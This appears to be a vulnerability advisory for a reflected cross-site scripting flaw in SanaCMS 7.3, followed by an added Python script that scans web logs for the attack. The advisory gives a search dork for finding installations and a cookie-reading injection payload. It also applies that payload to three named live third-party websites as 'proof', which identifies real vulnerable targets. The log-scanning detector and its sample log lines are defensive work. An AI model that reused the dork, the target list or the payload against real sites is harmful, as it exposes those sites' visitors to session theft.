Cross Site Scripting injection vulnerability in SANADATA SanaCMS 7.3


Cross-site scripting (XSS) vulnerability in /sanadata/seo/index.asp in SANADATA SanaCMS 7.3 allows remote attackers to inject arbitrary web script or HTML via the search parameter.


Vendor HomePage: https://www.sanadata.com/

Version: 7.3

Dork: intext:"SANADATA | SanaCMS 7.3"

Tested on: Firefox Browser


Vulnerability Path : http://127.0.0.1/sanadata/seo/index.asp?txtFrom="><img src=x onerror=alert(document.cookie)>&txtRank=&txtSite=


Proof :

http://www.esmhome.com/sanadata/seo/index.asp?txtFrom="><img src=x onerror=alert(document.cookie)>&txtRank=&txtSite=

http://www.miladenoor.org/sanadata/seo/index.asp?txtFrom="><img src=x onerror=alert(document.cookie)>&txtRank=&txtSite=

http://www.aradcharta.com/sanadata/seo/index.asp?txtFrom="><img src=x onerror=alert(document.cookie)>&txtRank=&txtSite=
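
Detection: the following is an added example, not part of the original advisory or of SanaCMS. It scans web server access logs for requests to the affected endpoint whose txtFrom, txtRank or txtSite values decode to characters that can break out of an HTML attribute. It assumes Common/Combined Log Format; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Endpoint and parameter names come from the advisory's request.
ENDPOINT = "/sanadata/seo/index.asp"
PARAMS = {"txtfrom", "txtrank", "txtsite"}
# Characters that let a reflected value close an attribute or open a tag.
MARKUP = re.compile(r"[\"'<>]")
# Request field of a Common/Combined Log Format entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')

def suspicious_params(log_line):
    """Return {param: decoded value} for advisory parameters carrying markup."""
    m = REQUEST.search(log_line)
    if not m:
        return {}
    url = urlsplit(m.group(1))
    # Classic ASP on IIS treats paths and query-string keys case-insensitively.
    if url.path.lower() != ENDPOINT:
        return {}
    hits = {}
    for name, values in parse_qs(url.query, keep_blank_values=True).items():
        if name.lower() in PARAMS:
            for value in values:
                if MARKUP.search(value):
                    hits[name] = value
    return hits

def scan(lines):
    """Return (line number, hits) for every log line that should be reviewed."""
    pairs = ((n, suspicious_params(l)) for n, l in enumerate(lines, start=1))
    return [(n, hits) for n, hits in pairs if hits]

# Constructed sample log lines (documentation IP range, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /sanadata/seo/index.asp'
    '?txtFrom=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.cookie)%3E'
    '&txtRank=&txtSite= HTTP/1.1" 200 5120',
    '192.0.2.11 - - [01/Jan/2024:10:01:00 +0000] "GET /sanadata/seo/index.asp'
    '?txtFrom=2024-01-01&txtRank=5&txtSite=example.com HTTP/1.1" 200 4980',
    '192.0.2.12 - - [01/Jan/2024:10:02:00 +0000] "GET /SanaData/SEO/Index.asp'
    '?TXTSITE=a%22b HTTP/1.1" 200 4990',
    '192.0.2.13 - - [01/Jan/2024:10:03:00 +0000] "GET /news.asp?id=%3Cb%3E'
    ' HTTP/1.1" 200 1200',
]

if __name__ == "__main__":
    for number, hits in scan(SAMPLE_LOG):
        print(number, hits)
```

Values are percent-decoded once, matching what the application receives; a hit means the request should be reviewed, not that the response actually reflected the value.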



